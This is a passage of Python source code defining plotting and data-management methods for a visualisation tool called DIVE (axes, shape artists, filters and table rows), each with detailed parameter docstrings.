x_unit : None, array (Default: None)
The unit to use for the x-axis.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
y_unit : None, str (Default: None)
The unit to use for the y-axis.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
z_unit : None, str (Default: None)
The unit to use for the z-axis.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
time_autoscale : bool (Default: False)
Toggle whether the axis limits should be scaled to fit the current
data values when the current time value is updated in DIVE.
Notes
-----
If the "pint" module hasn't been installed, the unit parameters will be ignored.
"""
self._dive_manager.add_axis(dict(name=name, axis_type=axis_type, title=title, x_grid=x_grid, y_grid=y_grid, z_grid=z_grid, x_label=x_label, y_label=y_label, z_label=z_label, x_unit=x_unit, y_unit=y_unit, z_unit=z_unit, time_autoscale=time_autoscale))
def add_axis_group(self, name, row_count, column_count, axis_names, rows, columns, row_spans, column_spans):
"""
Add an axis group to DIVE.
Parameters
----------
name : str
The name to use for this axis group.
row_count : int
The number of rows that this axis group should have.
column_count : int
The number of columns that this axis group should have.
axis_names : array
The names of the axes that this axis group should display.
rows : array
The row indices for the axes specified by "axis_names".
columns : array
The column indices for the axes specified by "axis_names".
row_spans : array
The number of rows that the axes specified by "axis_names" should span.
column_spans : array
The number of columns that the axes specified by "axis_names" should span.
"""
self._dive_manager.add_axis_group(dict(name=name, row_count=row_count, column_count=column_count, axis_names=axis_names, rows=rows, columns=columns, row_spans=row_spans, column_spans=column_spans))
def add_box_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, z_pos=0, z_pos_field=None, width=1, width_field=None, height=1, height_field=None, depth=1, depth_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, faces='XxYyZz'):
"""
Add a box artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_pos : numeric (Default: 0)
The position of the box center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the x-axis.
y_pos : numeric (Default: 0)
The position of the box center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the y-axis.
z_pos : numeric (Default: 0)
The position of the box center along the z-axis.
z_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the box center along the z-axis.
width : numeric (Default: 1)
The width of the box.
width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the box.
height : numeric (Default: 1)
The height of the box.
height_field : None, str (Default: None)
The name of the field in the data object that contains height values of the box.
depth : numeric (Default: 1)
The depth of the box.
depth_field : None, str (Default: None)
The name of the field in the data object that contains depth values of the box.
color : str (Default: "g")
The color to use for the box.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the box.
colormap: str (Default: "viridis")
The name of the colormap to use for the box.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for box color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for box color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
faces : str (Default: 'XxYyZz')
The faces of the box to display. Accepts lowercase and uppercase combinations of 'x', 'y', and 'z'.
Lowercase indicates negative side and uppercase indicates positive side.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'box', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, z_pos=z_pos, z_pos_field=z_pos_field, width=width, width_field=width_field, height=height, height_field=height_field, depth=depth, depth_field=depth_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, faces=faces))
def add_data(self, name, data, id_field=None, time_field=None, selection=None):
"""
Add a data object to DIVE.
Parameters
----------
name : str
The name to use for this data object.
data : pandas.DataFrame
The data to store in this data object.
All column names must be strings.
id_field : None, str (Default: None)
The name of the field in "data" that contains the ID for each row.
time_field : None, str (Default: None)
The name of the field in "data" that contains the timestamp for each row.
There are two valid types of time values in DIVE: numeric (not complex) and pandas.Timestamp with tz.
The timestamps must be monotonic increasing.
selection : None, array (Default: None)
The indices in "data" that should be selected.
Notes
-----
If the time value data type is not consistent across all data objects (excluding None),
then the animation controls will not be available in DIVE.
"""
self._dive_manager.add_data(dict(name=name, data=data, id_field=id_field, time_field=time_field, selection=selection))
def add_ellipse_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, start_angle=0, start_angle_field=None, span_angle=360, span_angle_field=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, edge_width=0, edge_width_field=None, x_radius=0.5, x_radius_field=None, y_radius=0.5, y_radius_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
"""
Add an ellipse artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
start_angle : numeric (Default: 0)
The counter clockwise starting angle of the ellipse in degrees.
start_angle_field : None, str (Default: None)
The name of the field in the data object that contains counter clockwise starting angles of the ellipse in degrees.
span_angle : numeric (Default: 360)
The angular region of the ellipse to display in degrees.
span_angle_field : None, str (Default: None)
The name of the field in the data object that contains angular regions of the ellipse to display in degrees.
x_pos : numeric (Default: 0)
The position of the ellipse center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the ellipse center along the x-axis.
y_pos : numeric (Default: 0)
The position of the ellipse center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the ellipse center along the y-axis.
edge_width : numeric (Default: 0)
The width of the ellipse edges.
If 0, the ellipse edges are not shown.
edge_width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the ellipse edges.
x_radius : numeric (Default: 1)
The radius of the ellipse along the x-axis.
x_radius_field : None, str (Default: None)
The name of the field in the data object that contains radius values of the ellipse along the x-axis.
y_radius : numeric (Default: 1)
The radius of the ellipse along the y-axis.
y_radius_field : None, str (Default: None)
The name of the field in the data object that contains radius values of the ellipse along the y-axis.
color : str (Default: "g")
The color to use for the ellipse.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the ellipse.
colormap: str (Default: "viridis")
The name of the colormap to use for the ellipse.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for ellipse color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for ellipse color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
edge_color : str (Default: "g")
The color to use for the ellipse edges.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "edge_color_field" is None.
edge_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the ellipse edges.
edge_colormap: str (Default: "viridis")
The name of the colormap to use for the ellipse edges.
Only used if "edge_color_field" is not None.
edge_color_label: None, str (Default: None)
The label to use for ellipse edge color values on the colorbar.
Only used if "edge_color_field" is not None.
edge_color_unit: None, array (Default: None)
The unit to use for ellipse edge color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "edge_color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'ellipse', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, start_angle=start_angle, start_angle_field=start_angle_field, span_angle=span_angle, span_angle_field=span_angle_field, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, edge_width=edge_width, edge_width_field=edge_width_field, x_radius=x_radius, x_radius_field=x_radius_field, y_radius=y_radius, y_radius_field=y_radius_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_filter_custom(self, name, values, enabled=True):
"""
Add a custom filter group to DIVE.
Parameters
----------
name : str
The name to use for this custom filter group.
values : dict
The indices to use in this custom filter group.
Each dictionary key should be the name of a data object
and each dictionary value should be an array of boolean values.
enabled : bool (Default: True)
Toggle usage of this custom filter group.
"""
self._dive_manager.add_filter('custom', dict(name=name, values=values, enabled=enabled))
def add_filter_id(self, name, values, enabled=True):
"""
Add an ID filter group to DIVE.
Parameters
----------
name : str
The name of to use for this ID filter group.
values : dict
The indices to use in this ID filter group.
Each dictionary key should be the name of a data object
and each dictionary value should be an array of ID values.
enabled : bool (Default: True)
Toggle usage of this ID filter group.
"""
self._dive_manager.add_filter('ID', dict(name=name, values=values, enabled=enabled))
def add_filter_value(self, name, data_names, filters=['AND'], id_filter=None, enabled=True):
"""
Add a value filter group to DIVE.
Parameters
----------
name : str
The name to use for this value filter group.
data_names : array
The names of the data objects to apply this value filter group to.
filters : array (Default: ["AND"])
The filters to apply to each data object specified by "data_names".
Filtering involves two kinds of items: filter items and logical items.
Filter items are an array with the format: [comparison_op, data_name, field_name, comparison_value]
Allowed values for the comparison_op are: ">", ">=", "==", "!=", "<=", "<"
Logical items are an array with the format: [logical_op, ...]
Allowed values for the logical_op are: "AND", "OR"
Both types of items can be added after the logical_op and the logical_op will be applied to the results of all of the subitems.
id_filter : None, str (Default: None)
The value specifying whether the output of this value filter group should be used to filter each data's ID field.
If None, ID filtering will not occur.
If "any match", a data ID value is kept if at least one occurrence of it is in the value filter groups's output.
If "all match", a data ID value is kept if all occurrences of it are in the value filter groups's output.
If "any mismatch", a data ID value is kept if at least one occurrence of it was filtered out.
If "all mismatch", a data ID value is kept if all occurrences of it were filtered out.
enabled : bool (Default: True)
Toggle usage of this value filter group.
"""
self._dive_manager.add_filter('value', dict(name=name, data_names=data_names, filters=filters, id_filter=id_filter, enabled=enabled))
def add_image_artist(self, axis_name, name, data_name, color_field, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, width=1, width_field=None, height=1, height_field=None, colormap='viridis', color_label=None, color_unit=None, interpolation='Nearest'):
"""
Add an image artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
color_field: str
The name of the field in the data object that contains color values for the image.
Every value in this field must be a 2D numpy.ndarray.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_pos : numeric (Default: 0)
The position of the image center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the image center along the x-axis.
y_pos : numeric (Default: 0)
The position of the image center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the image center along the y-axis.
width : numeric (Default: 1)
The width of the image.
width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the image.
height : numeric (Default: 1)
The height of the image.
height_field : None, str (Default: None)
The name of the field in the data object that contains height values of the image.
colormap: str (Default: "viridis")
The name of the colormap to use for the image.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for image color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for image color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
interpolation : str (Default: "Nearest")
The interpolation method to use for the image.
Allowed values are: 'Bessel', 'Bicubic', 'Bilinear', 'Blackman', 'CatRom', 'Gaussian', 'Hamming', 'Hanning', 'Hermite', 'Kaiser', 'Lanczos', 'Mitchell', 'Nearest', 'Quadric', 'Sinc', 'Spline16', 'Spline36'
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'image', dict(name=name, data_name=data_name, color_field=color_field, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, width=width, width_field=width_field, height=height, height_field=height_field, colormap=colormap, color_label=color_label, color_unit=color_unit, interpolation=interpolation))
def add_infinite_line_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, pos=0, pos_field=None, color='r', color_field=None, colormap='viridis', color_label=None, color_unit=None, is_vertical=True):
"""
Add an infinite line artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
pos : numeric (Default: 0)
The position of the line along the x/y-axis.
pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the line along the x/y-axis.
color : str (Default: "r")
The color to use for the line.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the line.
colormap: str (Default: "viridis")
The name of the colormap to use for the line.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for line color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for line color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
is_vertical : bool (Default: True)
Toggle whether the line is vertical (on the x-axis).
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'infinite line', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, pos=pos, pos_field=pos_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, is_vertical=is_vertical))
def add_polygon_artist(self, axis_name, name, data_name, x_field, y_field, visible=True, draw_order=0, legend_text=None, edge_width=0, edge_width_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
"""
Add a polygon artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
edge_width : numeric (Default: 0)
The width of the polygon edges.
If 0, the polygon edges are not shown.
edge_width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the polygon edges.
color : str (Default: "g")
The color to use for the polygon.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the polygon.
colormap: str (Default: "viridis")
The name of the colormap to use for the polygon.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for polygon color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for polygon color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
edge_color : str (Default: "g")
The color to use for the polygon edges.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "edge_color_field" is None.
edge_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the polygon edges.
edge_colormap: str (Default: "viridis")
The name of the colormap to use for the polygon edges.
Only used if "edge_color_field" is not None.
edge_color_label: None, str (Default: None)
The label to use for polygon edge color values on the colorbar.
Only used if "edge_color_field" is not None.
edge_color_unit: None, array (Default: None)
The unit to use for polygon edge color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "edge_color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'polygon', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, visible=visible, draw_order=draw_order, legend_text=legend_text, edge_width=edge_width, edge_width_field=edge_width_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_rectangle_artist(self, axis_name, name, data_name=None, visible=True, draw_order=0, legend_text=None, x_pos=0, x_pos_field=None, y_pos=0, y_pos_field=None, edge_width=0, edge_width_field=None, width=1, width_field=None, height=1, height_field=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
"""
Add a rectangle artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : None, str (Default: None)
The name of the data object to use for this artist.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
x_pos : numeric (Default: 0)
The position of the rectangle center along the x-axis.
x_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the rectangle center along the x-axis.
y_pos : numeric (Default: 0)
The position of the rectangle center along the y-axis.
y_pos_field : None, str (Default: None)
The name of the field in the data object that contains the positions of the rectangle center along the y-axis.
edge_width : numeric (Default: 0)
The width of the rectangle edges.
If 0, the rectangle edges are not shown.
edge_width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the rectangle edges.
width : numeric (Default: 1)
The width of the rectangle.
width_field : None, str (Default: None)
The name of the field in the data object that contains width values of the rectangle.
height : numeric (Default: 1)
The height of the rectangle.
height_field : None, str (Default: None)
The name of the field in the data object that contains height values of the rectangle.
color : str (Default: "g")
The color to use for the rectangle.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the rectangle.
colormap: str (Default: "viridis")
The name of the colormap to use for the rectangle.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for rectangle color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for rectangle color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
edge_color : str (Default: "g")
The color to use for the rectangle edges.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "edge_color_field" is None.
edge_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the rectangle edges.
edge_colormap: str (Default: "viridis")
The name of the colormap to use for the rectangle edges.
Only used if "edge_color_field" is not None.
edge_color_label: None, str (Default: None)
The label to use for rectangle edge color values on the colorbar.
Only used if "edge_color_field" is not None.
edge_color_unit: None, array (Default: None)
The unit to use for rectangle edge color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "edge_color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'rectangle', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, edge_width=edge_width, edge_width_field=edge_width_field, width=width, width_field=width_field, height=height, height_field=height_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_scatter_artist(self, axis_name, name, data_name, x_field, y_field, z_field=None, label_field=None, label_size=10, visible=True, draw_order=0, label_draw_order=0, legend_text=None, selectable=True,
line_width=1, line_color='r', line_color_field=None, line_colormap='viridis', line_color_label=None, line_color_unit=None,
marker='o', marker_size=10, marker_color='g', marker_color_field=None, marker_colormap='viridis', marker_color_label=None, marker_color_unit=None,
edge_width=0, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
"""
Add a scatter artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
z_field : None, str (Default: None)
The name of the field in the data object that contains the z coordinates for this artist.
If None, this artist will be two-dimensional.
label_field : None, str (Default: None)
The name of the field in the data object that contains labels for each data point.
If None, labels will not be shown.
label_size : numeric (Default: 10)
The font size to use for labels.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
label_draw_order : numeric (Default: 0)
The number used to determine the draw order for labels.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
selectable : bool (Default: True)
Toggle whether this artist is selectable.
line_width : numeric (Default: 1)
The width of the lines.
If 0, lines are not shown.
line_color : str (Default: "r")
The color to use for the lines.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "line_color_field" is None.
line_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the lines.
line_colormap: str (Default: "viridis")
The name of the colormap to use for the lines.
Only used if "line_color_field" is not None.
line_color_label: None, str (Default: None)
The label to use for line color values on the colorbar.
Only used if "line_color_field" is not None.
line_color_unit: None, array (Default: None)
The unit to use for line color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "line_color_field" is not None.
marker: str (Default: "o")
The shape to use for the markers.
marker_size: numeric (Default: 10)
The size of the markers.
If 0, markers are not shown.
marker_color : str (Default: "g")
The color to use for the markers.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "marker_color_field" is None.
marker_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the markers.
marker_colormap: str (Default: "viridis")
The name of the colormap to use for the markers.
Only used if "marker_color_field" is not None.
marker_color_label: None, str (Default: None)
The label to use for marker color values on the colorbar.
Only used if "marker_color_field" is not None.
marker_color_unit: None, array (Default: None)
The unit to use for marker color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "marker_color_field" is not None.
edge_width : numeric (Default: 1)
The width of the marker edges.
If 0, marker edges are not shown.
edge_color : str (Default: "r")
The color to use for the marker edges.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "edge_color_field" is None.
edge_color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the marker edges.
edge_colormap: str (Default: "viridis")
The name of the colormap to use for the marker edges.
Only used if "edge_color_field" is not None.
edge_color_label: None, str (Default: None)
The label to use for marker edge color values on the colorbar.
Only used if "edge_color_field" is not None.
edge_color_unit: None, array (Default: None)
The unit to use for marker edge color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "edge_color_field" is not None.
Notes
-----
If the data object has an ID field, lines will only connect points with the same ID.
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'scatter', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, z_field=z_field, label_field=label_field, label_size=label_size, visible=visible, draw_order=draw_order, label_draw_order=label_draw_order, legend_text=legend_text, selectable=selectable,
line_width=line_width, line_color=line_color, line_color_field=line_color_field, line_colormap=line_colormap, line_color_label=line_color_label, line_color_unit=line_color_unit,
marker=marker, marker_size=marker_size, marker_color=marker_color, marker_color_field=marker_color_field, marker_colormap=marker_colormap, marker_color_label=marker_color_label, marker_color_unit=marker_color_unit,
edge_width=edge_width, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_surface_artist(self, axis_name, name, data_name, x_field, y_field, z_field, visible=True, draw_order=0, legend_text=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None):
"""
Add a surface artist to an axis in DIVE.
Parameters
----------
axis_name : str
The name of the axis that this artist should be added to.
name : str
The name of this artist.
data_name : str
The name of the data object to use for this artist.
x_field : str
The name of the field in the data object that contains the x coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
y_field : str
The name of the field in the data object that contains the y coordinates for this artist.
Every value in this field must be a 1D numpy.ndarray.
z_field : str
The name of the field in the data object that contains the z coordinates for this artist.
Every value in this field must be a 2D numpy.ndarray.
visible : bool (Default: True)
Toggle whether this artist is visible.
draw_order : numeric (Default: 0)
The number used to determine the draw order for this artist.
Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
legend_text : None, str (Default: None)
The label to display in the legend for this artist.
If None, this artist will not appear in the legend.
color : str (Default: "g")
The color to use for the surface.
It must be either a hex string (such as "#ff0000") or the name of a CSS color.
Only used if "color_field" is None.
color_field: None, str (Default: None)
The name of the field in the data object that contains color values for the surface.
colormap: str (Default: "viridis")
The name of the colormap to use for the surface.
Only used if "color_field" is not None.
color_label: None, str (Default: None)
The label to use for surface color values on the colorbar.
Only used if "color_field" is not None.
color_unit: None, array (Default: None)
The unit to use for surface color values on the colorbar.
If array, it must have the format: [from_unit, to_unit]
Only "pint" units are valid.
Only used if "color_field" is not None.
Notes
-----
When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
All colorbar values that aren't numeric or timestamps (with tz),
will instead be displayed in the legend (as long as "legend_text" is not None).
It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
"""
self._dive_manager.add_artist(axis_name, 'surface', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, z_field=z_field, visible=visible, draw_order=draw_order, legend_text=legend_text, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit))
def add_table_row(self, data_name, field_name, label, operation, color_criteria=[], blend_colors=False, index=None):
"""
Add a table row to DIVE.
Parameters
----------
data_name : str
The name of the data object to use for this row.
field_name : str
The name of the field in the data object to use for this row.
label : str
The label to use for this row.
operation : str
The operation to perform on the data field.
There are two kinds of operations: "latest" and any pandas function that can be applied to a pandas.Series (sum, mean, min, max, ...).
If "latest", the most recent value in the data field will be shown. If there aren't any time values in the data object,
the last value in the data field will be shown.
color_criteria : array (Default: [])
The criteria to use for setting the row color.
Each element of the array should be an array with the format: [comparison_op, comparison_value, color_str]
The comparison_op specifies how the row's value should be compared to the comparison_value.
Allowed values for the comparison_op are: ">", ">=", "==", "!=", "<=", "<", "change"
If comparison_op is "change", the color_str will be applied every time the row value changes and the comparision_value will be ignored.
The comparison_op can only be "change" when the data object has a time field and "operation" is "latest".
blend_colors : bool (Default: False)
Toggle blending of row colors if multiple color criteria are True at the same time.
index : None, int (Default: None)
The index in the table to insert this row.
If None, this row will be appended to the table.
"""
